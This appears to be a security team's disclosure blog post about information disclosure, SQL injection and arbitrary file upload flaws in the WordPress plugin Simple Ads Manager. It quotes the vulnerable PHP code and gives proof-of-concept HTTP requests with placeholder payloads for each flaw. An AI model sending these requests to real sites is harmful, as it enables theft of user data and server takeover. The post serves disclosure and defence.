ITAS Team found out multiple critical vulnerabilities in Hakin9 IT Security Magazine

ITAS Team found out multiple critical vulnerabilities in Hakin9 IT Security Magazine

For the second time in 2 years, the ITAS Security Team has discovered vulnerabilities on the Hakin9 Magazine platform and informed the administrators of the risks. As a token of their appreciation, Hakin9 has awarded the ITAS Team a lifetime subscription of the Magazine.

Established in 2005 by Software Media LLC (Poland), Hakin9 is the English-version of a world renowned magazine on web security issues. The Magazine offers latest news and information on hackers’ attacks and methods, as well as solutions to protect systems, networks and applications. Also owned by Software Media LLC are 5 other well-established publications— Hakin9 Magazine, Pentest Magazine, eForensics Magazine, Software Developer’s Journal, Hadoop Magazine, Java Magazine—all of them known to and respected by the security community world-wide.

According to Hakin9, the magazine has a database of 100,000 security specialists. All of them, therefore, have been at risk of having their sensitive personal information (such as email and password) disclosed.

“Hakin9 is the biggest IT security magazine in the world, published for 10 years. We have a database of 100 000 IT security specialist.

Hakin9 magazine provides online visitors the exact information they need to stay up to date with the latest IT Security news and solutions and to learn what they can find on Hakin9′s pages. Our website is to help IT Security experts find out what new techniques and tools the hackers and crackers use and what we have prepared for you in the current issue.

It covers techniques of breaking into computer systems, defense and protection methods. Our magazine is useful for everyone interested in securing and hacking – both professionals (security officers, system administrators) and hobbyists.” (HAKIN9 Facebook).

Hakin9’s websites are all built on the wordpress platform, a user-friendly and very popular CMS with either free or paid plugins and themes. However, these plugins could cause severe vulnerabilities if rigorous checks are not followed before they are put to use.

In their research, the ITAS Security Team has found a number of vulnerabilities caused by the plugin “Simple Ads Manager” on hakin9.org, pentestmag.com, and eforensicsmag.com. The vulnerabilities include Information Disclosure, SQL Injection, and Arbitrary file upload, which hackers could exploit to steal sensitive information from the entire website, or worse, to execute malicious codes on or take over the server.

The ITAS Team of security specialists has attempted to contact the plugin producers via wordpress.org’s forums and the producers’ own website several times with no success. With some 20,000 active uses of the plugin, the number of websites being put under severe risks by this plugin is substantial.

1. Disclosing sensitive information (CVE-2015-2826)

Vulnerable version: 2.5.94, 2.5.96
The file wp-content/plugins/simple-ads-manager/sam-ajax.php has many actions (load_users, load_authors, load_cats, load_tags, load_posts, posts_debug, load_stats,…) can inadvertently reveal the users’ sensitive information such as username, email, user role in the database.

POC:
+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

action=load_users

2. SQL injection (CVE-2015-2824)

SQL injection 1

Vulnerability file: simple-ads-manager/sam-ajax.php, from line 109 to 128

case ‘sam_ajax_sam_hits’:
if(isset($_POST[‘hits’]) && is_array($_POST[‘hits’])) {
$hits = $_POST[‘hits’];
$values = ”;
$remoteAddr = $_SERVER[‘REMOTE_ADDR’];
foreach($hits as $hit) {
$values .= ((empty($values)) ? ” : ‘, ‘) . “({$hit[1]}, {$hit[0]}, NOW(), 0, “{$remoteAddr}”)”;
}
$sql = “INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};”;
$result = $wpdb->query($sql);
if($result > 0) echo json_encode(array(‘success’ => true, ‘sql’ => $sql, ‘addr’ => $_SERVER[‘REMOTE_ADDR’]));
else echo json_encode(array(
‘success’ => false,
‘result’ => $result,
‘sql’ => $sql,
‘hits’ => $hits,
‘values’ => $values
));
}
break;

POC:
POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
X-Requested-With: XMLHttpRequest
Content-Length: 103

action=sam_hits&hits[0][]=[SQL INJECTION HERE]&hits[1][]=[SQL INJECTION HERE]&level=3

SQL Injection 2

CODE: Vulnerability file: simple-ads-manager/sam-ajax-admin.php, from line 127 to line 168

case ‘sam_ajax_load_posts’:
$custs = (isset($_REQUEST[‘cstr’])) ? $_REQUEST[‘cstr’] : ”;
$sPost = (isset($_REQUEST[‘sp’])) ? urldecode( $_REQUEST[‘sp’] ) : ‘Post’;
$sPage = (isset($_REQUEST[‘spg’])) ? urldecode( $_REQUEST[‘spg’] ) : ‘Page’;
//set @row_num = 0;
//SELECT @row_num := @row_num + 1 AS recid
$sql = “SELECT
wp.id,
wp.post_title AS title,
wp.post_type AS type
FROM
$postTable wp
WHERE
wp.post_status = ‘publish’ AND
FIND_IN_SET(wp.post_type, ‘post,page{$custs}’)
ORDER BY wp.id;”;
$posts = $wpdb->get_results($sql, ARRAY_A);
$k = 0;
foreach($posts as &$val) {
switch($val[‘type’]) {
case ‘post’:
$val[‘type’] = $sPost;
break;
case ‘page’:
$val[‘type’] = $sPage;
break;
default:
$val[‘type’] = $sPost . ‘: ‘.$val[‘type’];
break;
}
$k++;
$val[‘recid’] = $k;
}
$out = array(
‘status’ => ‘success’,
‘total’ => count($posts),
‘records’ => $posts
);
break;

POC:
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=load_posts&cstr==[SQL INJECTION HERE]&sp=Post&spg=Page

Demonstration video
SQL Injection 3

CODE: Vulnerability file simple-ads-manager/sam-ajax-admin.php, from line 225 to line 255

case ‘sam_ajax_load_combo_data’:
$page = $_GET[‘page’];
$rows = $_GET[‘rows’];
$searchTerm = $_GET[‘searchTerm’];
$offset = ((int)$page – 1) * (int)$rows;
$sql = “SELECT
wu.id,
wu.display_name AS title,
wu.user_nicename AS slug,
wu.user_email AS email
FROM
$uTable wu
WHERE wu.user_nicename LIKE ‘{$searchTerm}%’
ORDER BY wu.id
LIMIT $offset, $rows;”;
$users = $wpdb->get_results($sql, ARRAY_A);
$sql = “SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE ‘{$searchTerm}%’;”;
$rTotal = $wpdb->get_var($sql);
$total = ceil((int)$rTotal/(int)$rows);
$out = array(
‘page’ => $page,
‘records’ => count($users),
‘rows’ => $users,
‘total’ => $total,
‘offset’ => $offset
);
break;

POC:
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=[SQL INJECTION HERE] HTTP/1.1
Host: target.com

action=load_combo_data

SQL Injection 4

CODE: Vulnerability file simple-ads-manager/sam-ajax-admin.php, from line 188 to line 223

case ‘sam_ajax_load_users’:
$roleSubscriber = (isset($_REQUEST[‘subscriber’])) ? urldecode($_REQUEST[‘subscriber’]) : ‘Subscriber’;
$roleContributor = (isset($_REQUEST[‘contributor’])) ? urldecode($_REQUEST[‘contributor’]) : ‘Contributor’;
$roleAuthor = (isset($_REQUEST[‘author’])) ? urldecode($_REQUEST[‘author’]) : ‘Author’;
$roleEditor = (isset($_REQUEST[‘editor’])) ? urldecode($_REQUEST[‘editor’]) : ‘Editor’;
$roleAdministrator = (isset($_REQUEST[“admin”])) ? urldecode($_REQUEST[“admin”]) : ‘Administrator’;
$roleSuperAdmin = (isset($_REQUEST[‘sadmin’])) ? urldecode($_REQUEST[‘sadmin’]) : ‘Super Admin’;
$sql = “SELECT
wu.id,
wu.display_name AS title,
wu.user_nicename AS slug,
(CASE wum.meta_value
WHEN 0 THEN ‘$roleSubscriber’
WHEN 1 THEN ‘$roleContributor’
WHEN 2 THEN ‘$roleAuthor’
ELSE
IF(wum.meta_value > 2 AND wum.meta_value <= 7, '$roleEditor', IF(wum.meta_value > 7 AND wum.meta_value <= 10, '$roleAdministrator', IF(wum.meta_value > 10, ‘$roleSuperAdmin’, NULL)
)
)
END) AS role
FROM $uTable wu
INNER JOIN $umTable wum
ON wu.id = wum.user_id AND wum.meta_key = ‘$userLevel’
ORDER BY wu.id;”;
$users = $wpdb->get_results($sql, ARRAY_A);
$k = 0;
foreach($users as &$val) {
$k++;
$val[‘recid’] = $k;
}
$out = $users;
break;

POC:
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=load_users&subscriber=[SQL INJECTION HERE]&contributor=[SQL INJECTION HERE]&author=[SQL INJECTION HERE]&editor=[SQL INJECTION HERE]&admin=[SQL INJECTION HERE]&sadmin=[SQL INJECTION HERE]

2. Uploading files with malicious codes (CVE-2015-2825)

The file /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php of version 2.5.94 contains a vulnerable upload function (which has been removed from version 2.5.96) which hackers could exploit to upload malicious codes onto the web server.

Code: Vulnerability file: simple-ads-manager/sam-ajax-admin.php, from line 303 to 314.

case ‘sam_ajax_upload_ad_image’:
if(isset($_POST[‘path’])) {
$uploadDir = $_POST[‘path’];
$file = $uploadDir . basename($_FILES[‘uploadfile’][‘name’]);
if ( move_uploaded_file( $_FILES[‘uploadfile’][‘tmp_name’], $file )) {
$out = array(‘status’ => “success”);
} else {
$out = array(‘status’ => “error”);
}
}
break;

POC:
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=—————————10898951822009525
Content-Length: 683

—————————–10898951822009525
Content-Disposition: form-data; name=”uploadfile”; filename=”info.php”
Content-Type: application/x-php

[CODE PHP HERE]
—————————–10898951822009525
Content-Disposition: form-data; name=”action”

upload_ad_image
—————————–10898951822009525—

Demonstration video

Warning: Websites are currently using the Simple Ads Manager plugin need to remove it immediately to avoid possible attacks and should only re-install it once the producers have repaired the vulnerabilities.

Trần Đình Tiến (tien.d.tran@itas.vn), Lê Ngọc Phi (phi.n.le@itas.vn) and ITAS Team

/ Blog / Tags: